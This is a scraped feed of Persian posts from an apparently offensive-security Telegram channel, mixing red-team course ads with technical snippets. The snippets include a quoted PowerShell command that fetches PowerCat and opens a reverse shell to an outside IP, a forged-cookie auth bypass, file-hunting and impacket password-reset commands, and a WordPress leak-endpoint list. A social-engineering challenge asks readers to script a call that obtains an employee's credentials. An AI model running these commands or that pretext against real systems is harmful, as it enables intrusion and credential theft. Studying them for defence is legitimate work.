6712
1 Nov 2020 1399/08/11 🔴 THB | Offensive Security آموزش، تحقیق و تجربه عملی در امنیت تهاجمی Penetration Testing · Red Teaming · AI Security 🎯 یاد بگیر. آزمایش کن. حرفهای شو.
معماری RAG: طراحی، امنیت و حملات
RAG (Retrieval-Augmented Generation) یک معماری ترکیبی است که بازیابی اطلاعات (Retrieval) را با تولید زبان طبیعی (Generation) ادغام میکند تا پاسخهای دقیقتر و مبتنی بر داده تولید کند.
اجزای اصلی معماری
1. Query Encoder: تبدیل پرسش کاربر به Vector Embedding معنایی.
2. Retriever: جستجو در Vector Database (مانند FAISS یا ChromaDB) برای یافتن اسناد مرتبط.
3. Generator: مدل زبانی (مانند GPT یا BART) که پاسخ را بر اساس اسناد بازیابیشده تولید میکند.
4. Knowledge Base: مخزن خارجی اسناد متنی که دانش سیستم را بهروز نگه میدارد.
فرآیند عملیاتی
کاربر سوال میپرسد → سوال به بردار تبدیل میشود → Retriever اسناد مرتبط را بازیابی میکند → Generator پاسخ نهایی را تولید میکند.
حملات رایج به RAG
1. Knowledge Poisoning: تزریق دادههای مخرب به پایگاه دانش برای انحراف پاسخها.
2. Indirect Prompt Injection: دستکاری ورودی کاربر برای تغییر رفتار Retriever یا Generator.
3. Cross-Tenant Leakage: دسترسی غیرمجاز به دادههای کاربران دیگر در سیستمهای چندمستاجره.
چالشهای امنیتی
- Data Integrity: اطمینان از صحت و اعتبار اسناد بازیابیشده.
- Access Control: جلوگیری از دسترسی به دادههای حساس یا طبقهبندیشده.
- Hallucination Mitigation: کاهش توهمهای مدل با استفاده از منابع معتبر.
معماری RAG با ترکیب Semantic Search و Language Generation، پل میان دانش خارجی و قدرت تولید مدلهای زبانی است، اما نیازمند لایههای دفاعی چندگانه برای مقابله با حملات نوظهور است.
🔥 اولین کانال فارسی زبان در AI Security .
@TryHackBox
@RadioZeroPod
@AiTHB
@TryHackBoxOfficial
ا 🔖 : AI Agent Kill Chain را میتوان در هشت مرحله درک کرد.
ا▪️ : AI agent ها فقط چت بات نیستند.
آنها میتوانند استدلال کنند، برنامه ریزی کنند، ابزارها را فراخوانی کنند، به داده ها دسترسی پیدا کنند، با APIها تعامل داشته باشند و در سیستم های متصل، اقداماتی انجام دهند. این قابلیت، یک سطح حملهی جدید و یک kill chain جدید ایجاد می کند.
درس کلیدی ساده است: AI agentها هرگز نباید مثل اپلیکیشن های معمولی در نظر گرفته شوند.
آنها به دسترسی سختگیرانهی least-privilege، تأیید انسانی برای اقدامات پرریسک، tool allowlists، اجرای ایزوله (isolated execution)، credentials کوتاه مدت، دفاع در برابر prompt injection و ثبت کامل audit logging نیاز دارند.
با گسترش استفادهی سازمانها از agentic AI، فقط ایمن سازی مدل کافی نخواهد بود.
باید خودِ agent، identity آن، tools آن، memory آن، دادههایش و هر سیستمی که به آن دسترسی دارد را ایمن کنید.
یکی از قدیمی ترین و خطرناک ترین پروتکل ها که هنوز روی خیلی از دستگاه ها پیدا میشه.
دستورات حمله واقعی به Telnet رو ببینید 👇
https://x.com/i/status/2079051452673147071
📌 برگزاری جلسه ویس چت :
با درود خدمت دوستان و همراهان عزیز،
در راستای ارتقای سطح دانش فنی و آشنایی بیشتر با مباحث امنیت سایبری، قصد داریم جلسهای تخصصی و آموزشی در خصوص زمینه SOC به صورت ویس چت برگزار کنیم.
🎙 مهمان ویژه:
👤 مهندس : مهتاب کسائی
📅 زمان برگزاری: امشب
📍 پلتفرم: ویس چت تلگرام
🕗 ساعت : 20:00
🔖 لینک جلسه :
🎙 قسمت اول
⁉️ موضوعات ما :
◾️زندگی روزمره یک SOC Analyst/Security Engineer
🔔 نکته مهم:
جهت شرکت به موقع جلسه، حتماً کانال تلگرام را چک کنید تا از این جلسه جا نمونید .
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
🆔 @RadioZeroPod
🆔 @TryHackBox
در حال تشکیل یک تیم داوطلبانه کوچک برای توسعه یک پلتفرم در حوزه امنیت سایبری هستیم. پروژه در مرحله شروع قرار داره و میخوایم اعضای اصلی تیم رو از همین ابتدا کنار هم جمع کنیم تا مسیر رشد پروژه رو با هم بسازیم.
در حال حاضر، برای این نقش ها به صورت مشخص نیاز داریم:
- Front-end Development
- Back-end Development
- Database
- DevOps و Cloud
✅ تجربه عملی کار روی یک پروژه واقعی، از ایده تا انتشار
✅ همکاری با یک تیم هدفمند در حوزه امنیت سایبری و توسعه نرمافزار
✅ ثبت نقش شما در صفحه تیم پروژه (Contributor/Team Member)
✅ گواهی همکاری پس از مشارکت مؤثر
✅ امکان استفاده از پروژه در رزومه، LinkedIn و GitHub
✅ اولویت برای همکاری های بلندمدت در صورت رشد پروژه
بایپس احراز هویت از طریق Forged Session Cookie
(مرکز مدیریت فایروال امن سیسکو)
تحلیل:
- فقط وجود کوکی CGISESSID را بررسی میکند.
- اما بررسی نمی کند که آیا شناسه سشن معتبر، فعال و مرتبط با یک کاربر احراز هویت شده است یا خیر.
تاثیر:
یک مهاجم می تواند یک مقدار دلخواه یا پیش فرض مانند csm_processes را ارائه دهد تا از هدایت به صفحه /ui/login جلوگیری کند و به منابع محافظت شده دسترسی غیرمجاز پیدا کند.
پس اگر واقعاً از خواندن مطالب اینچنینی لذت میبرید، لطفاً حمایت خود را نشان دهید 🔥
@TryHackBox
📌 برگزاری جلسه ویس چت :
با درود خدمت دوستان و همراهان عزیز،
در راستای ارتقای سطح دانش فنی و آشنایی بیشتر با مباحث امنیت سایبری، قصد داریم جلسهای تخصصی و آموزشی در خصوص زمینه DFIR به صورت ویس چت برگزار کنیم.
🎙 مهمان ویژه:
👤 مهندس : صابر غفاری مقدم
📅 زمان برگزاری: سه شنبه 1405/04/16
📍 پلتفرم: ویس چت تلگرام
🕗 ساعت : 20:00
🔖 لینک جلسه :
🎙 قسمت اول
⁉️ موضوعات ما :
◾ا: DFIR در مقیاس: واقعیت های فارنزیک و معماری در امنسازی زیرساخت بانکی تراکنشی»
🔔 نکته مهم:
جهت شرکت به موقع جلسه، حتماً کانال تلگرام را چک کنید تا از این جلسه جا نمونید .
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
🆔 @RadioZeroPod
🆔 @TryHackBox
پورت ۲۲: SSH : شل امن
حملهی Brute Force، سرقت Key، Tunneling و Misconfigurationها
ا : SSH پروتکل اصلی مدیریت از راه دور برای سیستمهای لینوکس/یونیکس است.
https://x.com/i/status/2073644099408691670
#ردتیم
📌 برگزاری جلسه ویس چت : مهندس پیمان خدابنده
با درود خدمت دوستان و همراهان عزیز،
در راستای ارتقای سطح دانش فنی و آشنایی بیشتر با مباحث امنیت سایبری، قصد داریم جلسهای تخصصی و آموزشی در خصوص حوزه Red Teaming به صورت ویس چت برگزار کنیم.
🎙 مهمان ویژه:
👤 مهندس : پیمان خدابنده
📅 زمان برگزاری: جمعه 1405/04/12
📍 پلتفرم: گوگل میت
🕗 ساعت : 20:00
🔖 لینک جلسه :
https://meet.google.com/ebv-ozik-wns
🎙 قسمت اول
⁉️ موضوعات ما :
◾ مقدمهای بر Red Teaming و جایگاه Malware در فرآیند حمله + تحلیل استاتیک بدافزار
🔔 نکته مهم:
جهت شرکت به موقع جلسه، حتماً کانال تلگرام را چک کنید تا از این جلسه جا نمونید .
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
🆔 @RadioZeroPod
🆔 @TryHackBox
اگر در حوزه امنیت اطلاعات فعالیت می کنید، چه سهمی از زندگی تان صرف کار و کسب درآمد از مهارت هایتان میشود؟
شما چطور بین کار و زندگی تعادل برقرار میکنید؟ چه کارهایی انجام میدهید تا از فشار کاری فاصله بگیرید، ذهنتان را ریکاوری کنید و دوباره با انرژی برگردید؟ تجربهها و ترفندهایتان را با بقیه به اشتراک بگذارید.
خیلیها فکر میکنند ابزار Mimikatz قدیمی شده و دیگه استفاده نمیشه. این تصور کاملاً قابل درکه، چون ابزارهای جدید و تکنیکهای پیشرفتهای هر روز معرفی میشن. اما واقعیت اینه که Mimikatz هنوز یکی از مهمترین و پرکاربردترین ابزارها در دنیای واقعی امنیت سایبریه چرا Mimikatz هنوز قابل استفادس ؟
استفاده گسترده اون توسط ردتیمرها ، پنتسترها و تیم های امنیتی سازمان ها هنوز از Mimikatz (یا نسخههای fork شده و در-memory اون) برای شبیه سازی حملات واقعی، استخراج credentialها، Privilege Escalation و Lateral Movement استفاده میکنند. این ابزار جزء استاندارد toolkitهای Metasploit، Cobalt Strike و خیلی از فریم ورکهای مدرن هست و حتی روی Windows 10/11 با privilege مناسب، هنوز مؤثر عمل میکنه. Microsoft سعی کرده محدودیت هایی بذاره (مثل غیرفعال کردن WDigest)، اما Mimikatz مدام بهروزرسانی میشه و تکنیک های جدید رو پشتیبانی میکنه. بسیاری از حملات واقعی هنوز از credential dumping با Mimikatz الهام میگیرن و یک ابزار دوگانه Mimikatz نه تنها برای مهاجمان، بلکه برای دفاع هم حیاتیه. اگر بخوای بدونی اتکرها چطور credentialها رو سرقت میکنن، چطور در شبکه حرکت میکنن و چطور دفاعت رو تست کنی، باید عمیق بشناسی اش. بدون درک Mimikatz، تشخیص و جلوگیری از خیلی از حملات واقعی سخت میشه.
هنوز در گزارش های Red Canary، SentinelOne، Varonis و حملات APTها و ransomwareها ردپای Mimikatz (یا تکنیکهای مشابه) دیده میشه. خیلی از تست های امنیتی سازمانی هم بدون این ابزار کامل نیست.
گاهی اوقات برای بایپس کردن تشخیص های امنیتی (EDR/AV) یا کار کردن بهتر روی نسخههای خاص ویندوز، نیاز هست سورس کد Mimikatz رو تغییر بدی، کامپایل کنی یا از فورک های بهروز شده استفاده کنی. این دقیقاً یکی از مهارت های عملی مهمیه که متخصصان واقعی بلدند.
صرفا برای دوستانی که فکر میکنند این ابزار کارایی نداره ، اگر مطلبی بود اضافه کنید
📌 دوره : راهنمای جامع ابزار Mimikatz
💢 توضیحات دوره : Mimikatz بدون شک یکی از مهم ترین و مؤثرترین ابزارهایی است که در دنیای امنیت سایبری و عملیات تیم قرمز مورد استفاده قرار می گیرد. این ابزار توسط برنامه نویس فرانسوی Benjamin Delpy ایجاد شد. او در ابتدا Mimikatz را برای یادگیری عمیق تر زبان C و درک بهتر مکانیزم های امنیتی ویندوز توسعه داد.
این ابزار با بهره برداری هوشمند از ضعف های موجود در معماری ویندوز، مجموعهای از حملات مهم و پرکاربرد را به صورت یکپارچه و آماده ارائه می دهد. Mimikatz کار را برای متخصصان بسیار آسان تر کرده است؛ به شکلی که بدون نیاز به دانش بسیار تخصصی از ساختارهای داخلی، می توان از آن برای گسترش دسترسی در شبکه های مبتنی بر ویندوز استفاده کرد. این ابزار همچنان فعالانه به روزرسانی میشود و تکنیک های جدید به آن اضافه می گردد.
💢 با تدریس: مهندس سجاد تیموری
⭕ مشاهده جزئیات دوره و خرید:
Link
🔖 جستجو برای فایلهای رمزگذاری شده
در ماژول
Password Attack -> Cracking Protected Files
یک دستور ساده یک خطی برای پیدا کردن فایل های احتمالا رمزگذاری شده (دارای پسورد) در لینوکس ارائه شده است.
$ for ext in $(echo ".xls .xls* .xltx .od* .doc .doc* .pdf .pot .pot* .pp*");do echo -e "\nFile extension: " $ext; find / -name *$ext 2>/dev/null | grep -v "lib\|fonts\|share\|core" ;done
C:\ را با $env:USERPROFILE جایگزین کنید".xls",".xls*",".xltx",".od*",".doc",".doc*",".pdf",".pot",".pot*",".pp*" | % { "`nFile extension: $_"; gci C:\ -Recurse -Filter "*$ _" -ea 0 | ? { $_.FullName -notmatch "lib|fonts|share|core" } | % FullName }
🔥 بازنشانی رمز عبور منقضی شده حساب دامنه از طریق null-session و SAMR
یک مقاله جالب در دنیای فناوری خواندم و با روشی برای بازنشانی رمز عبور منقضی شده از طریق null-session برخورد کردم.
اصل مطلب:
در صورت خطای STATUS_PASSWORD_MUST_CHANGE، روشهای استاندارد مانند impacket-changepasswd و smbpasswd ممکن است در ویندوزهای جدید کار نکنند. اما یک ترفند وجود دارد که نیاز است هاستی با null-session مجاز پیدا کنید (از طریق nxc smb $IP -u '' -p '' بررسی کنید) و دستور زیر را اجرا کنید:
impacket-changepasswd -protocol smb-samr -newpass 'NewPass' 'domain\user:OldPass@<IP_с_null_sess> -dc-ip <IP_DC>'
impacket-changepasswd -protocol smb-samr -newpass 'NewP@ssw0rd321!' 'duty-free.cc/user1:P@ssw0rd12@192.168.78.2 -dc-ip 192.168.78.1'
📚 کتابچه "Mimikatz: تسلط عملی بر تکنیکهای پیشرفته حملات Active Directory" از مقدماتی تا پیشرفته.
اگر در حوزه امنیت سایبری و تست نفوذ Active Directory فعالیت میکنید، این کتابچه ضروریترین منبعی است که میتوانید داشته باشید!
منبعی کامل برای تیمهای قرمز (Red Team)، شامل دستورات عملی، اسکریپتهای آماده، و تکنیکهای evasion است که مستقیماً در تستهای نفوذ استفاده میشوند.
همین حالا این کتاب تخصصی را به زبان فارسی بخوانید.
🔥 تخفیف
💰 قیمت اصلی: ۲۵۰,۰۰۰ تومان
💥 با تخفیف : ۲۰۰,۰۰۰ تومان
⚠️ مهلت تخفیف: ۲ روز
📌 جهت خرید و کسب اطلاعات بیشتر، به ایدی زیر پیام دهید:
@THBxSupport
@TryHackBox
⭕ سری چالش های SE : هک انسان 1/20
📌 چالش : "تماس IT پشتیبانی"
سناریو:
شما درحال مهندسی اجتماعی هستید و هدفتون دسترسی به اطلاعات داخلی یک شرکت فرضی به نام "Datanova" هست. شما به عنوان یک "کارمند پشتیبانی IT" با خانم/آقای میترا شاهینی، منشی بخش مالی، تماس میگیرید.
📌 هدف: گرفتن یوزرنیم و ریست پسورد ایمیلش (بدون اینکه شک کنه).
📓 اطلاعات از پیش:
◾ شما اسم مدیرش (سهراب فریدونی) رو از لینکدین پیدا کردید.
◾ میدونید شرکت هفته پیش یک آپدیت سیستمی داشته.
◾میترا معمولاً ساعت ۹ صبح سرکاره.
> شما چه دیالوگ و استراتژی ای برای این تماس استفاده می کنید تا میترا بهتون اعتماد کنه؟ (متن دقیق مکالمه یا حداقل ۳-۴ تاکتیکی که به کار میبرید رو تو کامنت بنویسید).
🧩 گاهی اوقات، مجرمان سایبری تمایل دارند که دستگیر شوند. بیایید یک مثال دیگر و ابزاری را بررسی کنیم که من کمتر در حملات واقعی با آن مواجه شدهام.
🔖 طبق این گزارش، مهاجم از PowerShell برای دانلود و اجرای PowerCat استفاده کرده است
◾ یک ابزار متنباز، مشابه Netcat، برای اجرای یک شل معکوس:
powershell.exe -c IEX (New-Object System.Net.WebClient).DownloadString (‘hxxps://raw[.]githubusercontent[.]com/besimorhino/powercat/master/powercat.ps1’); powercat -c 154.17.26[.]41 -p 8080 -e cmd
event_type: "processcreatewin"
AND
cmdline: "powercat"
هک سیستم های SCADA : پیداکردن سیستم های SCADA با استفاده از Censys
همانطور که میدانید، سیستم های SCADA/ICS در سراسر جهان به طور مداوم مورد حمله قرار میگیرند. این سیستم های صنعتی هستند که در برخی موارد، میتوانند بر اقتصاد یک کشور تأثیر بگذارند و هدف اصلی در هر جنگ سایبری محسوب می شوند. پیداکردن آن ها با استفاده از ابزارهای مختلف (nmap / Shodan / و غیره) نسبتاً آسان است.
اگر از این دست پست ها را دوست دارید علاقه خود را با 🔥نشان دهید.
@TryHackBox
@TryHackBoxofficial
چهار گروه بدافزار، پلیس پاکستان را با استفاده از PlugX، ShadowPad، Remcos و Cobalt Strike مورد هدف قرار دادند.
محققان امنیت سایبری، جزئیاتی از فعالیتهای جاسوسی سایبری مداوم علیه چندین سازمان پلیس پاکستان را فاش کردند. این فعالیتها توسط گروههایی از هکرها انجام شده است که احتمالاً با چین و هند مرتبط هستند، و این حملات از فوریه 2024 تا آوریل 2026 ادامه داشته است.
https://thehackernews.com/2026/07/hackers-weaponize-balochistan-police.html
@RadioZeroPod
@TryHackBoxStory
@TryHackBoxOfficial
@TryHackBox
⭕️ قسمت هشتم زیرو تاک
📌 موضوع جلسه : مقدمهای بر Red Teaming و جایگاه Malware در فرآیند حمله + تحلیل استاتیک بدافزار
🎙 مهمان برنامه : مهندس پیمان خدابنده
منتظر جلسه بعدی باشید.
🎤 راهبر گفتگوی امنیتی : حسین نائیجی
🆔 @RadioZeroPod
🆔 @TryHackBox
🆔 @TryHackBoxOfficial
🆔 @TryHackBoxStory
❗ تخفیف ویژه ❗
📚 کتابچه "Mimikatz: تسلط عملی بر تکنیکهای پیشرفته حملات Active Directory" از مقدماتی تا پیشرفته.
📕 جزئیات بیشتر کتاب
💰 قیمت : ۲۵۰,۰۰۰ تومان
💰 تخفیف : ۱۹۰,۰۰۰ تومان
📖 وایرشارک برای ردتیمرها: از پایه تا پیشرفته
📕 جزئیات بیشتر کتاب
💰 قیمت : ۲۵۰,۰۰۰ تومان
💰 تخفیف : ۱۸۰,۰۰۰ تومان
📖 شکار عملی باگ بانتی : از Recon تا Bounty واقعی : متدولوژی و شناسایی و آسیب پذیری های دنیای واقعی
📕 جزئیات بیشتر کتاب
💰 قیمت : ۳۶۰,۰۰۰ تومان
💰تخفیف : ۲۸۰,۰۰۰ تومان
‼️ مهلت تخفیف : 3 روز
📌 جهت خرید به ایدی زیر پیام دهید:
@THBxSupport
دوستان اگر سوالی دارید حتما داخل گروه بپرسید تا در جلسات آینده مطرح شه
Читать полностью…
این چیت شیت جامع شامل دستورات کاربردی و سریع برای Host & Network Discovery و Service Enumeration و Web Enumeration است.
بدون توضیح اضافی دستورات آورده شده تا به عنوان مرجع سریع برای پنتسترها، متخصصان امنیت سایبری و هکرهای اخلاقی استفاده شود. کافیست IP یا دامنه هدف را جایگزین کنید و از آنها بهره ببرید.
https://lnkd.in/dEbMZyCw
@TryHackBox
📌 دوره: راهنمای جامع ابزار Mimikatz
💢 توضیحات دوره: Mimikatz بدون شک یکی از مهم ترین و موثرترین ابزارهایی است که در دنیای امنیت سایبری و عملیات تیم قرمز مورد استفاده قرار می گیرد.این ابزار توسط برنامه نویس فرانسوی Benjamin Delpy ایجاد شد.او در ابتدا Mimikatz را برای یادگیری عمیق تر زبان C و درک بهتر مکانیزم های امنیتی ویندوز توسعه داد.
این ابزار با بهره برداری هوشمند از ضعف های موجود در معماری ویندوز،مجموعهای از حملات مهم و پرکاربرد را به صورت یکپارچه و آماده ارائه می دهد. Mimikatz کار را برای متخصصان بسیار آسان تر کرده است؛به شکلی که بدون نیاز به دانش بسیار تخصصی از ساختارهای داخلی،می توان از آن برای گسترش دسترسی در شبکه های مبتنی بر ویندوز استفاده کرد.این ابزار همچنان فعالانه به روزرسانی میشود و تکنیک های جدید به آن اضافه می گردد.
📌 توضیحات کامل
◽مدرس : مهندس سجاد تیموری
◽مدت زمان دوره : ۵ ساعت ۲۰ دقیقه
◻ دوره : آفلاین
⭕ دوره دارای گروه پشتیبانی می باشد.
💰 قیمت : ۲,۰۰۰,۰۰۰ تومان
💰 با تخفیف ویژه : ۱,۲۵۰,۰۰۰ تومان
📌 جهت خرید،به ایدی زیر پیام دهید:
@ThbxSupport
Group
@TryHackBox
"نشت اطلاعات حساس و عدم وجود مجوز از طریق اندپوینت API"
برای پیدا کردن باگ های نشت اطلاعات در وردپرس از این فهرست سریع من استفاده کنید:
/api/v1/export/data
/api/v1/config
/api/debug/env
/api/v2/auth/sessions
/api/v1/admin/users
/wp-json/wordfence/v1/config
/api/v1/billing/details
/api/v1/db/stats
/api/v1/logs
/api/v1/health
/api/v1/status
/api/v1/internal/settings
/api/v1/cloud/credentials
/api/v1/user/profile
/api/v1/system/info
/api/v1/backup/list
/wp-json/wp/v2/users
/wp-json/wp/v2/settings
/wp-json/wp/v2/media
/wp-json/wp/v2/posts?status=any
/wp-json/wp/v2/pages?status=private
/wp-json/elementor/v1/system-info
درود خدمت دوستان گرامی بنده اینجا روی حملات اکتیو دایرکتوری و مباحث ردتیم تمرکز خواهم کرد و سناریوها و معرفی و اطلاعات جامع در مورد پروتکل ها و موارد دیگر که تجربه بنده هست رو در اختیار شما عزیزان قرار میدهم .
@KavehOffSec
در اینجا یک LLM-honeypot از Beelzebub برای گرفتار کردن کریپتوجکرها آوردم.
این یک تلهٔ سادهٔ SSH است که به جای پاسخ های ایستا با قالب های ثابت، به مهاجم با متنی واقعی نما پاسخ می دهد که توسط یک LLM تولید میشود. بدین ترتیب رفتار سرور طبیعی به نظر میرسد، اپراتور پاسخ های قابل باور به دستورات را میگیرد و لاگ تمام نشست های جعلی ذخیره می شود.
ساختار پایهٔ تله (YAML):
apiVersion: "v1"
protocol: "ssh"
address: ":2222"
description: "SSH LLM Honeypot"
commands:
- regex: "^(.+)$"
plugin: "LLMHoneypot"
serverVersion: "OpenSSH"
serverName: "ubuntu"
passwordRegex: "^(root|qwerty|Smoker666|123456|jenkins|minecraft|sinus|alex|postgres|Ly123456)$"
deadlineTimeoutSeconds: 120
plugin:
llmProvider: "openai"
llmModel: "gpt-4o"
openAISecretKey: "sk-proj-1234567890""``
بررسی عمیق یک سیستم کشف و پاسخ الکترونیکی که توسط سازمانهای امنیتی چین به کار گرفته شده است
https://netaskari.substack.com/p/chinas-guardian-of-secrets
@pfksecurity